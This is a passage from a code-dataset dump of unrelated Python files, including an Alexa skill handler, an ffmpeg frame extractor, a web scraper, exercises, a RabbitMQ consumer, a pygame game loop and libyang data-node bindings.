Demo skill.\"\n # Setting this to true ends the session and exits the skill.\n should_end_session = True\n return build_response({}, build_speechlet_response(\n card_title, speech_output, None, should_end_session))\n\n# --------------- Events ------------------\n\ndef on_session_started(session_started_request, session):\n \"\"\" Called when the session starts \"\"\"\n\n print(\"on_session_started requestId=\" + session_started_request['requestId']\n + \", sessionId=\" + session['sessionId'])\n\n\ndef on_launch(launch_request, session):\n \"\"\" Called when the user launches the skill without specifying what they\n want\n \"\"\"\n\n print(\"on_launch requestId=\" + launch_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # Dispatch to your skill's launch\n return get_welcome_response()\n\n\ndef on_intent(intent_request, session):\n \"\"\" Called when the user specifies an intent for this skill \"\"\"\n\n print(\"on_intent requestId=\" + intent_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n\n intent = intent_request['intent']\n intent_name = intent_request['intent']['name']\n\n # Dispatch to your skill's intent handlers\n if intent_name == \"OnTheJobIntent\":\n return get_on_the_job_response(intent, session)\n elif intent_name == \"AMAZON.HelpIntent\":\n return get_welcome_response()\n elif intent_name == \"AMAZON.CancelIntent\" or intent_name == \"AMAZON.StopIntent\":\n return handle_session_end_request()\n else:\n raise ValueError(\"Invalid intent: \" + intent_name)\n\n\ndef on_session_ended(session_ended_request, session):\n \"\"\" Called when the user ends the session.\n\n Is not called when the skill returns should_end_session=true\n \"\"\"\n print(\"on_session_ended requestId=\" + session_ended_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # add cleanup logic here\n\n\n# --------------- Main handler ------------------\n\ndef lambda_handler(event, context):\n \"\"\" Route the incoming request based on type (LaunchRequest, IntentRequest,\n etc.) The JSON body of the request is provided in the event parameter.\n \"\"\"\n print(\"event.session.application.applicationId=\" +\n event['session']['application']['applicationId'])\n\n \"\"\"\n Uncomment this if statement and populate with your skill's application ID to\n prevent someone else from configuring a skill that sends requests to this\n function.\n \"\"\"\n # if (event['session']['application']['applicationId'] !=\n # \"amzn1.echo-sdk-ams.app.[unique-value-here]\"):\n # raise ValueError(\"Invalid Application ID\")\n\n if event['session']['new']:\n on_session_started({'requestId': event['request']['requestId']},\n event['session'])\n\n if event['request']['type'] == \"LaunchRequest\":\n return on_launch(event['request'], event['session'])\n elif event['request']['type'] == \"IntentRequest\":\n return on_intent(event['request'], event['session'])\n elif event['request']['type'] == \"SessionEndedRequest\":\n return on_session_ended(event['request'], event['session'])\n","sub_path":"sample-onet-demo/lambda.py","file_name":"lambda.py","file_ext":"py","file_size_in_byte":6940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"77489672","text":"# 图片单独存放,视频名作为文件夹\nimport glob,os\nimport argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--mp4-path', type=str, required=True)\nparser.add_argument('--img-path', type=str, required=True)\nargs = parser.parse_args()\n\n\nif not os.path.exists(args.img_path):\n os.mkdir(args.img_path)\nnew_name = args.mp4_path + '/*.mp4'\nvideo_lists = sorted(glob.glob(new_name))\nfor video in video_lists:\n video_name = video.split('/')[-1]\n video_name = video_name.split('.')[0]\n img_folder = os.path.join(args.img_path,video_name)\n if not os.path.exists(img_folder):\n os.mkdir(img_folder)\n command = 'ffmpeg -i {0} -vsync 0 {1}/%3d.png -y'.format(video, img_folder)\n os.system(command)\n\n#python3 video2img.py --mp4-path ./SDR_540p --img-path ./data/test_lr\n#python3 video2img.py --mp4-path ./videos/gt --img-path ./data/hr\n#python3 video2img.py --mp4-path ./videos/X4 --img-path ./data/lr","sub_path":"RCAN_PyTorch/video2img.py","file_name":"video2img.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"501098355","text":"import os\nimport string\nimport requests\nfrom bs4 import BeautifulSoup\n\n# ?searchType=journalSearch&sort=PubDate&page=2\n\ndef main():\n num_pages = int(input())\n article_type = input()\n page_count = 1\n url = \"\"\n\n while page_count <= num_pages:\n if page_count == 1:\n url = \"https://www.nature.com/nature/articles\"\n else:\n url = \\\n f\"https://www.nature.com/nature/articles?searchType=journalSearch&sort=PubDate&page={page_count}\"\n\n r = requests.get(url)\n\n if r.status_code == 200:\n soup = BeautifulSoup(r.content, 'html.parser')\n\n articles = soup.find_all('article')\n\n os.mkdir(f\"Page_{page_count}\")\n # scrape the page for the article type\n for article in articles:\n type = article.select_one('[data-test=\"article.type\"]')\n\n if type:\n type = type.text.strip()\n\n if type == article_type:\n print(\"article type found: \" + type)\n title = article.select_one('h3.c-card__title').text.lower().replace(' ', '_').replace(string.punctuation, '').strip()\n article_link = article.select_one('a').get('href')\n print(\"Article link: \" + article_link)\n article_request = requests.get(\"https://www.nature.com\" + article_link)\n\n if article_request.status_code == 200:\n print(\"Fetched the articles content\")\n article_content = BeautifulSoup(article_request.content, 'html.parser')\n article_body = article_content.find('div', attrs={'class':'article-item__body'})\n\n if article_body:\n print(os.getcwd())\n file_name = title + '.txt'\n file_path = os.getcwd() + '\\\\' + f\"Page_{page_count}\"\n save_path = os.path.join(file_path, file_name)\n\n article_binary = bytes(article_body.text.strip(), 'utf-8')\n print(title)\n file = open(save_path, 'wb')\n # file = open(title + '.txt', 'wb')\n file.write(article_binary)\n file.close()\n print('Finished writing to file')\n else:\n article_body = article_content.find('div', attrs={'class':'c-article-body'})\n if article_body:\n print(os.getcwd())\n file_name = title + '.txt'\n file_path = os.getcwd() + '\\\\' + f\"Page_{page_count}\"\n save_path = os.path.join(file_path, file_name)\n\n article_binary = bytes(article_body.text.strip(), 'utf-8')\n print(title)\n file = open(save_path, 'wb')\n # file = open(title + '.txt', 'wb')\n file.write(article_binary)\n file.close()\n print('Finished writing to file')\n else:\n print('There was an issue navigating to the news article')\n # else:\n # print('No news article was found')\n page_count += 1\n\n\nmain()\n\n\n","sub_path":"web-scraper.py","file_name":"web-scraper.py","file_ext":"py","file_size_in_byte":3698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"194788176","text":"\nclass Solution:\n\n def maxDistance(self, arrays) -> int:\n\n # [[1,2,3], [4,5], [1,2,3]]\n # i = 0, cur_min = 1, cur_max = 3, tot_min = 1, tot_max = 3, min_dist = None, max_dist = None\n # i = 1, cur_min = 4, cur_max = 5, tot_min = 1, tot_max = 3, min_dis = abs(3-4), max_dist = abs(5-1)\n # i = 2, cur_min = 1, cur_max = 3, tot_min = 1, tot_max = 5, min_dis = abs(5-1), max_dist = abs(3-1)\n # general: cur_min = 1, cur_max = 3, tot_min = 1, tot_max = 5, min_dis = abs(tot_max-cur_min), max_dist = abs(cur_max-tot_min)\n\n # [[1,4], [0,5]], expected = 4\n # i = 0, min = 1, max = 4, min_dist = None, max_dist = None\n # i = 1, min = 1, max = 5, min_dis = abs(0-4), max_dist = abs(5-1)\n # i = 2, min = 1, max = 5\n # distance = max - min = 4\n\n # [[-1, 1], [-3, 1, 4], [-2, -1, 0, 2]], expected = 6\n # i = 0, cur_min = -1, cur_max = 1, min_dist = None, max_dist = None\n # i = 1, cur_min = -3, cur_max = 4, min_dis = abs(1-(-3)), max_dist = abs(4-(-1)), dist = 5\n # i = 2, cur_min = -2, cur_max = 2, min_dis = abs(4-(-2))\n # distance = max - min = 4\n\n tot_max = tot_min = None\n distance = min_dist = max_dist = 0\n\n for i in range(len(arrays)):\n array = arrays[i]\n cur_min = array[0]\n cur_max = array[len(array) - 1]\n\n if tot_min != None:\n min_dist = abs(tot_max - cur_min)\n max_dist = abs(cur_max - tot_min)\n if distance < min_dist:\n distance = min_dist\n if distance < max_dist:\n distance = max_dist\n\n if tot_min == None or cur_min < tot_min:\n tot_min = cur_min\n\n if tot_max == None or cur_max > tot_max:\n tot_max = cur_max\n\n return distance\n\n","sub_path":"max_dist_in_arrays/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"472497037","text":"import tensorflow as tf\nfrom housing import HousingPrice\n\nX_train, X_test, y_train, y_test = HousingPrice().prepare_data()\n\nX = tf.placeholder(shape=(None, X_train.shape[1]), dtype=tf.float32, name=\"X\")\ny = tf.placeholder(shape=(None, 1), dtype=tf.float32, name=\"y\")\n\ntheta = tf.Variable(tf.random_uniform([X_train.shape[1], 1], -1.0, 1.0, seed=42), dtype=tf.float32, name=\"theta\")\ny_pred = tf.matmul(X, theta, name=\"predictions\")\nerror = y_pred - y\nmse = tf.reduce_mean(tf.square(error), name=\"mse\")\noptimizer = tf.train.GradientDescentOptimizer(learning_rate=0.01)\nconfig = tf.ConfigProto()\nconfig.log_device_placement = True\ninit = tf.global_variables_initializer()\ntraining_op = optimizer.minimize(mse)\nwith tf.Session(config=config) as sess:\n init.run()\n sess.run(training_op, feed_dict={X: X_train, y: y_train.reshape(-1,1)})\n print(theta.eval())\n save_path = tf.train.Saver().save(sess, \"../model/024.ckpt\")\n\n\n\n\n","sub_path":"src/024_Tensorflow_02.py","file_name":"024_Tensorflow_02.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"476823254","text":"from linkedList import Node, SinglyLinkedList\n\n\ndef sum_lists(list1, list2):\n list1_int = list_to_int(list1)\n list2_int = list_to_int(list2)\n sum_of_lists = int(list1_int) + int(list2_int)\n sum_of_lists_string = str(sum_of_lists)\n\n new_list = Node()\n head = new_list\n\n for ch in sum_of_lists_string[::-1]:\n new_node = Node(data=ch)\n new_list.next = new_node\n new_list = new_list.next\n\n final_list = SinglyLinkedList()\n final_list.root = head.next\n\n return final_list\n\n\ndef list_to_int(input_list):\n list_stack = list()\n curr = input_list.root\n while curr:\n list_stack.append(curr.data)\n curr = curr.next\n\n tmp_int = \"\"\n while list_stack:\n tmp_int += str(list_stack.pop())\n return tmp_int\n\n\nif __name__ == \"__main__\":\n list1 = SinglyLinkedList()\n list1.insert(7)\n list1.insert(1)\n list1.insert(6)\n print(list1)\n list2 = SinglyLinkedList()\n list2.insert(5)\n list2.insert(9)\n list2.insert(2)\n print(list2)\n new_list = sum_lists(list1, list2)\n print(new_list)\n","sub_path":"CTCI/Chap_2/sum_lists.py","file_name":"sum_lists.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"463129032","text":"# -*- coding: utf-8 -*-\n#\n# Copyright (C) 2015 Rodrigo Silva (MestreLion) \n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. See \n\n'''Basic implementation of enum module for Python 2 and 3'''\n\n__all__ = ['Enum'] # not necessary as Enum is the only non-__*__ name\n\nimport sys\n\nclass _meta(type):\n @property\n def __members__(self):\n return {k: v for k, v in self.__dict__.items()\n if not k.startswith(\"_\")\n and not self._callable(getattr(self, k))}\n\n def __iter__(self):\n '''Yield members sorted by value, not declaration order'''\n return iter(sorted(self.__members__.values()))\n\n def __reversed__(self):\n '''Yield members sorted by descending value order'''\n return reversed(tuple(self))\n # tuple() is required to create a sequence out of the Enum\n\n def __getitem__(self, k):\n try:\n return self.__members__[k]\n except KeyError:\n # re-raise as AttributeError, for consistency with Enum.VALUE\n raise AttributeError(\"type object '{}' has no attribute '{}'\".\n format(self.__name__, k))\n\n def __contains__(self, k):\n return k in self.__members__\n\n def __len__(self):\n return len(self.__members__)\n\n\nclass _base(object):\n @staticmethod\n def _callable(obj):\n '''Helper wrapper for callable() that works on Python 3.0 and 3.1'''\n try:\n return callable(obj)\n except NameError:\n # Python 3.0 and 3.1 has no callable()\n # which is a tiny safer than hasattr approach\n return hasattr(obj, \"__call__\")\n\n @classmethod\n def name(cls, value):\n '''\n Fallback for getting a friendly member name\n Return a titled string with underscores replaced by spaces\n AnEnum.name(AnEnum.AN_ORDINARY_MEMBER) => \"An Ordinary Member\"\n Enums can customize member names by overriding this method\n '''\n # value not handled in subclass name()\n for k, v in cls.__members__.items():\n if v == value:\n return k.replace('_', ' ').title()\n\n # Value not find. Try again using value as member name.\n # Allows usage as Enum.name(\"VALUE\") besides Enum.name(Enum.VALUE)\n return cls.name(cls[value])\n\n @classmethod\n def members(cls):\n '''\n Return a list of member attribute names (strings),\n ordered by value to make it consistent with class iterator\n '''\n return sorted(cls.__members__, key=cls.__members__.get)\n\n\n# Python 2\nif sys.version_info[0] < 3:\n class Enum(_base):\n '''A basic implementation of Enums for Python 2'''\n __metaclass__ = _meta\n\n# Python 3\nelse:\n # Python 2 see Python 3 metaclass declaration as SyntaxError, hence exec()\n exec(\"class Enum(_base, metaclass=_meta):\"\n \"'''A basic implementation of Enums for Python 3'''\")\n\ndel sys, _base, _meta\n\n\nif __name__ == '__main__':\n # Usage and Examples\n\n class Color(Enum):\n '''Enum class example'''\n\n # Declaration order is irrelevant, sorting will always be by value\n # Values can be any non-callable, and in Python 3 must be comparable\n # Bottom line: don't make an Enum of functions,\n # and don't mix numbers with strings\n BLACK = 0\n WHITE = 10 # This will sort last\n DEFAULT = -1 # This will sort first\n RED = 1\n GREEN = 2\n BLUE = 3\n NICE_ONE = 4\n\n # Methods are not considered members\n # That's why member values cannot be callables\n\n @classmethod\n def name(cls, v):\n '''Optional custom name function'''\n if v == cls.BLACK: return \"is back!\"\n if v == cls.WHITE: return \"Delight\"\n\n # Uses default name as fallback for members not listed above\n return super(Color, cls).name(v)\n\n @classmethod\n def counterpart(cls, v):\n '''Custom method example'''\n if v == cls.DEFAULT: return v\n if v == cls.BLACK: return cls.WHITE\n if v == cls.WHITE: return cls.BLACK\n\n return v + 1 if v + 1 in cls else cls.DEFAULT\n\n # Value and types\n print(Color.RED, Color[\"RED\"], type(Color.RED)) # 1, 1, \n\n # Testing values\n print(\"Red is the new Black?\",\n Color.BLACK == 1, # False\n Color.BLACK == 0) # True\n\n # Names\n print(Color.name(1)) # \"Red\"\n print(Color.name(\"GREEN\")) # \"Green\"\n print(Color.name(Color.BLUE)) # \"Blue\"\n print(Color.name(Color.NICE_ONE)) # \"Nice One\"\n\n # Custom names\n print(\"Black\", Color.name(Color.BLACK), # \"is back!\"\n \"White\", Color.name(\"WHITE\")) # \"Delight\"\n\n # Membership\n print(\"is green a color?\", Color.GREEN in Color) # True\n\n # Iterating the class yields values,\n # iterating on members() yields member attribute names (as strings)\n # Both automatically sorted by value, for consistency with each other\n for color, member in zip(Color, Color.members()):\n print(color, member, Color.name(color))\n\n # Custom methods\n for color in Color:\n print(Color.name(color), \"<=>\", Color.name(Color.counterpart(color)))\n\n # Adding and removing members\n Color.YELLOW = 5\n del Color.NICE_ONE\n\n # Member count\n print(\"colors in a rainbow:\", len(Color)) # 7\n\n # Using internal dict\n print(\"members dict:\", Color.__members__)\n\n # Handling exceptions\n try:\n print(Color.BROWN)\n except Exception as e:\n print(repr(e)) # AttributeError\n try:\n print(Color['BROWN'])\n except Exception as e:\n print(repr(e)) # Also AttributeError, for consistency\n try:\n print(Color['name']) # Color.name exists but is not a member\n except Exception as e:\n print(\"Members only!\", repr(e)) # AttributeError\n try:\n print(Color[2]) # Not allowed\n except Exception as e:\n print(\"I am NOT a sequence!\", repr(e))\n\n # Reverse\n print(\"But I have built-in reversed:\", tuple(reversed(Color)))\n\n # Class type, inheritance, structure\n print(type(Color), \"is an Enum?\", issubclass(Color, Enum)) # , True\n print(\"MRO:\", Color.mro()) # Color, Enum, _base, object\n print(\"class:\", dir(Color))\n\n # Module cleanness\n del Color, color, member\n print(\"module:\", globals()) # only Enum and the default __*__\n","sub_path":"enum.py","file_name":"enum.py","file_ext":"py","file_size_in_byte":7136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"3464616","text":"\"\"\"生产者:auto=False(自动应答关闭)\"\"\"\nimport pika\nimport time\n### 创建socket:获取与rabbitmq服务的连接,虚拟队列需要指定参数 ###\nconnection = pika.BlockingConnection(pika.ConnectionParameters('localhost'))\n### 创建一个AMQP信道(channel) ###\nchannel = connection.channel()\n### 声明队列queue ###\nchannel.queue_declare(queue='task_queue') # queue名为task_queue\n\n### 定义回调处理消息的函数 ###\ndef callback(ch, method, properties, body):\n print(\"[x] Received %r.\"%body) # body为二进制格式\n # time.sleep(20)\n print(\"[x] Done\")\n print(\"method.delivery_tag\", method.delivery_tag)\n print(\"properties\", properties)\n ch.basic_ack(delivery_tag=method.delivery_tag) # 消费者收到消息返回消息标识符(ack:acknowledge)\n\n### 消费者消费:告诉rabbitmq,用callback来接收并处理消息 ###\nchannel.basic_consume(queue='task_queue',\n on_message_callback=callback, # 获取body后执行回调函数\n auto_ack=False) # 自动应答关闭,消息不需要确认(与no_ack一样,只是叫法不一样)\nprint(\"[*] Waiting for messages. To eixt press CTAL+C\")\nchannel.start_consuming() # 启动消费模式","sub_path":"rabbitmq/05.safe_consumer2.py","file_name":"05.safe_consumer2.py","file_ext":"py","file_size_in_byte":1261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"360610412","text":"import pygame\nimport pygame.locals as pl\n\nimport rstore\nimport score\nfrom scene import TitleScene, OptionsScene\nimport tutorial\nimport const\n\nclass JukeBox(object):\n \"\"\"Game jukebox that handles music and sfx.\n\n We have three attributes that are important:\n soundon - this will be true unless we couldn't initialize pygame music\n musicon - this can be set by the user via the menu\n sfxon - this can be set by the user via the menu\n \"\"\"\n\n def __init__(self):\n try:\n pygame.mixer.init()\n except: \n self.soundon = False\n else:\n self.soundon = True\n\n # mapping of file names to sound effects and music\n self.sfx = rstore.sfx\n self.music = rstore.music\n\n self.playing = None\n\n # we let the user configure these\n self._sfxon = True\n self._musicon = True\n\n def play_music(self, name):\n if self.soundon and self._musicon:\n pygame.mixer.music.load(self.music[name])\n # -1 means repeat\n pygame.mixer.music.play(-1)\n self.playing = name\n\n def play_music_if(self, name):\n \"\"\"Play music if not already playing.\"\"\"\n\n if self.playing != name:\n self.play_music(name)\n\n def stop_music(self):\n pygame.mixer.music.stop()\n\n def play_sfx(self, name):\n if self.soundon and self._sfxon:\n self.sfx[name].play()\n\n def toggle_sfx(self):\n self._sfxon = not self._sfxon\n\n def toggle_music(self):\n if self._musicon:\n self.stop_music()\n self._musicon = False\n else:\n self._musicon = True\n self.play_music(self.playing)\n\n def is_sfx_on(self):\n return self._sfxon\n\n def is_music_on(self):\n return self._musicon\n\n\nclass Game(object):\n def __init__(self):\n \"\"\"Setup pygame, display, resource loading etc.\"\"\"\n\n pygame.init()\n self.screen = pygame.display.set_mode(const.SCREEN_SIZE)\n pygame.display.set_caption('Save all 8 bits')\n self.clock = pygame.time.Clock()\n\n # load images, fonts and sounds\n rstore.load_resources()\n\n # high scores\n score.load_high_scores()\n\n self.juke = JukeBox()\n\n self.juke.play_music('reawakening')\n\n pygame.mouse.set_cursor(*pygame.cursors.tri_left)\n\n def toggle_option(self, option_name):\n \"\"\"Change option (tutorial, music, sfx).\"\"\" \n if (option_name == OptionsScene.OPTION_TUTORIAL):\n tutorial.is_active = not tutorial.is_active\n elif (option_name == OptionsScene.OPTION_MUSIC):\n self.juke.toggle_music()\n elif (option_name == OptionsScene.OPTION_SFX):\n self.juke.toggle_sfx()\n\n def get_options(self):\n \"\"\"Return current state of options available for options menu screen.\"\"\"\n return {OptionsScene.OPTION_TUTORIAL: tutorial.is_active,\n OptionsScene.OPTION_MUSIC: self.juke.is_music_on(),\n OptionsScene.OPTION_SFX: self.juke.is_sfx_on()}\n\n def mainloop(self):\n\n # first scene of the game\n ascene = TitleScene(self)\n\n # initialize clock\n dt = self.clock.tick(const.FPS) / 1000.0\n\n while ascene != None:\n # get all events we are interested in.\n quitevent = False\n events = []\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n quitevent = True\n if ((event.type == pl.MOUSEBUTTONDOWN) or \n (event.type == pl.MOUSEBUTTONUP)):\n events.append(event)\n\n # scene specific updating based on events.\n ascene.process_input(events, dt)\n\n # update not based on events.\n ascene.update(dt)\n\n # draw to the screen.\n ascene.render(self.screen)\n\n # possible change to new scene.\n ascene = ascene.next\n\n # draw to the screen!\n pygame.display.flip()\n\n # delay for correct time here.\n dt = self.clock.tick(const.FPS) / 1000.0\n\n if quitevent:\n ascene = None\n pygame.quit()\n\ndef main():\n gm = Game()\n gm.mainloop()\n","sub_path":"src/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":4278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"494955675","text":"# Copyright (c) 2020 6WIND S.A.\n# SPDX-License-Identifier: MIT\n\nimport logging\n\nfrom _libyang import ffi\nfrom _libyang import lib\n\nfrom .schema import Module\nfrom .schema import SContainer\nfrom .schema import SLeaf\nfrom .schema import SLeafList\nfrom .schema import SList\nfrom .schema import SNode\nfrom .schema import SRpc\nfrom .schema import Type\nfrom .util import LibyangError\nfrom .util import c2str\nfrom .util import str2c\n\n\nLOG = logging.getLogger(__name__)\n\n\n#------------------------------------------------------------------------------\ndef printer_flags(with_siblings=False, pretty=False, keep_empty_containers=False,\n trim_default_values=False, include_implicit_defaults=False):\n flags = 0\n if with_siblings:\n flags |= lib.LYP_WITHSIBLINGS\n if pretty:\n flags |= lib.LYP_FORMAT\n if keep_empty_containers:\n flags |= lib.LYP_KEEPEMPTYCONT\n if trim_default_values:\n flags |= lib.LYP_WD_TRIM\n if include_implicit_defaults:\n flags |= lib.LYP_WD_ALL\n return flags\n\n\n#------------------------------------------------------------------------------\ndef data_format(fmt_string):\n if fmt_string == 'json':\n return lib.LYD_JSON\n if fmt_string == 'xml':\n return lib.LYD_XML\n if fmt_string == 'lyb':\n return lib.LYD_LYB\n raise ValueError('unknown data format: %r' % fmt_string)\n\n\n#------------------------------------------------------------------------------\ndef path_flags(update=False, rpc_output=False, no_parent_ret=False):\n flags = 0\n if update:\n flags |= lib.LYD_PATH_OPT_UPDATE\n if rpc_output:\n flags |= lib.LYD_PATH_OPT_OUTPUT\n if no_parent_ret:\n flags |= lib.LYD_PATH_OPT_NOPARENTRET\n return flags\n\n\n#------------------------------------------------------------------------------\ndef parser_flags(data=False, config=False, get=False, strict=False,\n trusted=False, no_yanglib=False, rpc=False, rpcreply=False,\n destruct=False, no_siblings=False, explicit=False):\n flags = 0\n if data:\n flags |= lib.LYD_OPT_DATA\n if config:\n flags |= lib.LYD_OPT_CONFIG\n if get:\n flags |= lib.LYD_OPT_GET\n if strict:\n flags |= lib.LYD_OPT_STRICT\n if trusted:\n flags |= lib.LYD_OPT_TRUSTED\n if no_yanglib:\n flags |= lib.LYD_OPT_DATA_NO_YANGLIB\n if rpc:\n flags |= lib.LYD_OPT_RPC\n if rpcreply:\n flags |= lib.LYD_OPT_RPCREPLY\n if destruct:\n flags |= lib.LYD_OPT_DESTRUCT\n if no_siblings:\n flags |= lib.LYD_OPT_NOSIBLINGS\n if explicit:\n flags |= lib.LYD_OPT_EXPLICIT\n return flags\n\n\n#------------------------------------------------------------------------------\nclass DNode:\n \"\"\"\n Data tree node.\n \"\"\"\n def __init__(self, context, node_p):\n \"\"\"\n :arg Context context:\n The libyang.Context python object.\n :arg struct lyd_node * node_p:\n The pointer to the C structure allocated by libyang.so.\n \"\"\"\n self.context = context\n self._node = ffi.cast('struct lyd_node *', node_p)\n\n def name(self):\n return c2str(self._node.schema.name)\n\n def module(self):\n mod = lib.lyd_node_module(self._node)\n if not mod:\n raise self.context.error('cannot get module')\n return Module(self.context, mod)\n\n def schema(self):\n return SNode.new(self.context, self._node.schema)\n\n def parent(self):\n if not self._node.parent:\n return None\n return self.new(self.context, self._node.parent)\n\n def root(self):\n node = self\n while node.parent() is not None:\n node = node.parent()\n return node\n\n def first_sibling(self):\n n = lib.lyd_first_sibling(self._node)\n if n == self._node:\n return self\n return self.new(self.context, n)\n\n def siblings(self, include_self=True):\n n = lib.lyd_first_sibling(self._node)\n while n:\n if n == self._node:\n if include_self:\n yield self\n else:\n yield self.new(self.context, n)\n n = n.next\n\n def find_one(self, xpath):\n try:\n return next(self.find_all(xpath))\n except StopIteration:\n return None\n\n def find_all(self, xpath):\n node_set = lib.lyd_find_path(self._node, str2c(xpath))\n if not node_set:\n raise self.context.error('cannot find path')\n try:\n for i in range(node_set.number):\n yield DNode.new(self.context, node_set.d[i])\n finally:\n lib.ly_set_free(node_set)\n\n def path(self):\n path = lib.lyd_path(self._node)\n try:\n return c2str(path)\n finally:\n lib.free(path)\n\n def validate(self, data=False, config=False, get=False, rpc=False,\n rpcreply=False, no_yanglib=False):\n flags = parser_flags(\n data=data, config=config, get=get, rpc=rpc,\n rpcreply=rpcreply, no_yanglib=no_yanglib)\n node_p = ffi.new('struct lyd_node **')\n node_p[0] = self._node\n ret = lib.lyd_validate(node_p, flags, ffi.NULL)\n if ret != 0:\n raise self.context.error('validation failed')\n\n def merge(self, source, destruct=False, no_siblings=False, explicit=False):\n flags = parser_flags(destruct=destruct, no_siblings=no_siblings,\n explicit=explicit)\n ret = lib.lyd_merge(self._node, source._node, flags)\n if ret != 0:\n raise self.context.error('merge failed')\n\n def print_mem(self, fmt,\n with_siblings=False,\n pretty=False,\n include_implicit_defaults=False,\n trim_default_values=False,\n keep_empty_containers=False):\n flags = printer_flags(\n with_siblings=with_siblings, pretty=pretty,\n include_implicit_defaults=include_implicit_defaults,\n trim_default_values=trim_default_values,\n keep_empty_containers=keep_empty_containers)\n buf = ffi.new('char **')\n fmt = data_format(fmt)\n ret = lib.lyd_print_mem(buf, self._node, fmt, flags)\n if ret != 0:\n raise self.context.error('cannot print node')\n try:\n if fmt == lib.LYD_LYB:\n # binary format, do not convert to unicode\n return c2str(buf[0], decode=False)\n return c2str(buf[0], decode=True)\n finally:\n lib.free(buf[0])\n\n def print_file(self, fileobj, fmt,\n with_siblings=False,\n pretty=False,\n include_implicit_defaults=False,\n trim_default_values=False,\n keep_empty_containers=False):\n flags = printer_flags(\n with_siblings=with_siblings, pretty=pretty,\n include_implicit_defaults=include_implicit_defaults,\n trim_default_values=trim_default_values,\n keep_empty_containers=keep_empty_containers)\n fmt = data_format(fmt)\n ret = lib.lyd_print_fd(fileobj.fileno(), self._node, fmt, flags)\n if ret != 0:\n raise self.context.error('cannot print node')\n\n def print_dict(self, strip_prefixes=True, absolute=True,\n with_siblings=False, include_implicit_defaults=False,\n trim_default_values=False, keep_empty_containers=False):\n \"\"\"\n Convert a DNode object to a python dictionary.\n\n :arg DNode dnode:\n The data node to convert.\n :arg bool strip_prefixes:\n If True (the default), module prefixes are stripped from dictionary\n keys. If False, dictionary keys are in the form ``:``.\n :arg bool absolute:\n If True (the default), always return a dictionary containing the\n complete tree starting from the root.\n :arg bool with_siblings:\n If True, include the node's siblings.\n :arg bool include_implicit_defaults:\n Include implicit default nodes.\n :arg bool trim_default_values:\n Exclude nodes with the value equal to their default value.\n :arg bool keep_empty_containers:\n Preserve empty non-presence containers.\n \"\"\"\n flags = printer_flags(\n include_implicit_defaults=include_implicit_defaults,\n trim_default_values=trim_default_values,\n keep_empty_containers=keep_empty_containers)\n\n def _to_dict(node, parent_dic):\n if not lib.lyd_node_should_print(node._node, flags):\n return\n if strip_prefixes:\n name = node.name()\n else:\n name = '%s:%s' % (node.module().name(), node.name())\n if isinstance(node, DList):\n list_element = {}\n for child in node:\n _to_dict(child, list_element)\n parent_dic.setdefault(name, []).append(list_element)\n elif isinstance(node, (DContainer, DRpc)):\n container = {}\n for child in node:\n _to_dict(child, container)\n parent_dic[name] = container\n elif isinstance(node, DLeafList):\n parent_dic.setdefault(name, []).append(node.value())\n elif isinstance(node, DLeaf):\n parent_dic[name] = node.value()\n\n dic = {}\n dnode = self\n if absolute:\n dnode = dnode.root()\n if with_siblings:\n for sib in dnode.siblings():\n _to_dict(sib, dic)\n else:\n _to_dict(dnode, dic)\n return dic\n\n def merge_data_dict(self, dic, rpc=False, rpcreply=False, strict=False,\n data=False, config=False, no_yanglib=False):\n \"\"\"\n Merge a python dictionary into this node. The returned value is the\n first created node.\n\n :arg dict dic:\n The python dictionary to convert.\n :arg bool rpc:\n Data represents RPC or action input parameters.\n :arg bool rpcreply:\n Data represents RPC or action output parameters.\n :arg bool strict:\n Instead of ignoring (with a warning message) data without schema\n definition, raise an error.\n :arg bool data:\n Complete datastore content with configuration as well as state\n data. To handle possibly missing (but by default required)\n ietf-yang-library data, use no_yanglib=True.\n :arg bool config:\n Complete datastore without state data.\n :arg bool no_yanglib:\n Ignore (possibly) missing ietf-yang-library data. Applicable only\n with data=True.\n \"\"\"\n return dict_to_dnode(dic, self.module(), parent=self,\n rpc=rpc, rpcreply=rpcreply, strict=strict,\n data=data, config=config, no_yanglib=no_yanglib)\n\n def free(self, with_siblings=True):\n try:\n if with_siblings:\n lib.lyd_free_withsiblings(self._node)\n else:\n lib.lyd_free(self._node)\n finally:\n self._node = None\n\n def __repr__(self):\n cls = self.__class__\n return '<%s.%s: %s>' % (cls.__module__, cls.__name__, str(self))\n\n def __str__(self):\n return self.name()\n\n NODETYPE_CLASS = {}\n\n @classmethod\n def register(cls, *nodetypes):\n def _decorator(nodeclass):\n for t in nodetypes:\n cls.NODETYPE_CLASS[t] = nodeclass\n return nodeclass\n return _decorator\n\n @classmethod\n def new(cls, context, node_p):\n node_p = ffi.cast('struct lyd_node *', node_p)\n nodecls = 